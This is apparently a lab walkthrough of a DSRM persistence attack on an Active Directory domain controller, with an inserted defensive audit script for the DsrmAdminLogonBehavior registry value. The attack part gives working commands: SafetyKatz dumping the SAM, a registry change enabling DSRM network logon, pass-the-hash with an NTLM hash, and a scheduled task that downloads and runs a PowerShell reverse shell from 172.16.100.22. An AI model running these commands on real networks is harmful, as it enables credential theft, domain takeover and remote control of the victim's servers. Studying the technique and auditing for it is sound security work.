A DSRM (Directory Services Restore Mode) attack gives you the password hash of the local Administrator account on the DC, the account whose password was set when the DC was promoted.

First, let's dump the SAM database on the DC:

.\SafetyKatz.exe '"token::elevate"' '"lsadump::sam"' '"exit"'


Notice that we got the password hash of the local Administrator on the DC.

To log in as this local Administrator on the DC using DSRM, we need to set a registry value called DsrmAdminLogonBehavior (under HKLM\System\CurrentControlSet\Control\Lsa). It does not exist by default; a value of 2 allows the DSRM account to log on over the network while the DC is running normally:

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
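From the defender's side, the registry value above is the thing to watch. The following audit script is an added example, not part of the original notes; it assumes the ActiveDirectory module, WinRM access to each DC, and a `-Remediate` switch of my own naming. Value 1 (DSRM logon only while AD DS is stopped) and 2 (always allowed) are flagged; with `-Remediate` the value is removed, restoring the default.

```powershell
# Added defensive check (not from the original notes): audit every DC for the
# DsrmAdminLogonBehavior value this technique depends on. Assumes the
# ActiveDirectory module and WinRM access; -Remediate is a hypothetical switch.
param([switch]$Remediate)

$regPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

$dcs = (Get-ADDomainController -Filter *).HostName

foreach ($dc in $dcs) {
    $r = Invoke-Command -ComputerName $dc -ArgumentList $regPath, $valueName, [bool]$Remediate -ScriptBlock {
        param($path, $name, $fix)
        $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
        if ($null -eq $item) {
            # Default state: value absent, DSRM account cannot log on while AD DS runs.
            return [pscustomobject]@{ Value = $null; Status = 'OK (absent)'; Action = 'none' }
        }
        $v = $item.$name
        $status = switch ($v) {
            0       { 'OK (0: DSRM logon disabled)' }
            1       { 'WARN (1: DSRM logon allowed only when AD DS is stopped)' }
            2       { 'ALERT (2: DSRM logon always allowed; matches the attack setting)' }
            default { "UNKNOWN ($v)" }
        }
        $action = 'none'
        if ($fix -and $v -ne 0) {
            # Removing the value restores the default behaviour.
            Remove-ItemProperty -Path $path -Name $name
            $action = 'value removed'
        }
        [pscustomobject]@{ Value = $v; Status = $status; Action = $action }
    }
    [pscustomobject]@{ DC = $dc; Value = $r.Value; Status = $r.Status; Action = $r.Action }

    # Recent Security events recording a change to this value. Requires "Audit
    # Registry" object access auditing plus a SACL on the Lsa key; without it
    # no 4657 events are written and this step simply returns nothing.
    Get-WinEvent -ComputerName $dc -FilterHashtable @{ LogName = 'Security'; Id = 4657 } `
        -MaxEvents 500 -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $valueName } |
        Select-Object TimeCreated, @{ n = 'DC'; e = { $dc } }, Message
}
```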


Now we pass the hash to log in as this local Administrator user:

.\SafetyKatz.exe '"sekurlsa::pth /user:Administrator /domain:dcorp-dc /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'


A new PowerShell window opens in the context of that account.


As observed, we can now list the contents of C$ on the DC.

Next, we create a scheduled task on the DC to give us a reverse shell:

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''http://172.16.100.22/Invoke-PowerShellTcp.ps1''')'"


Now let's start the scheduled task.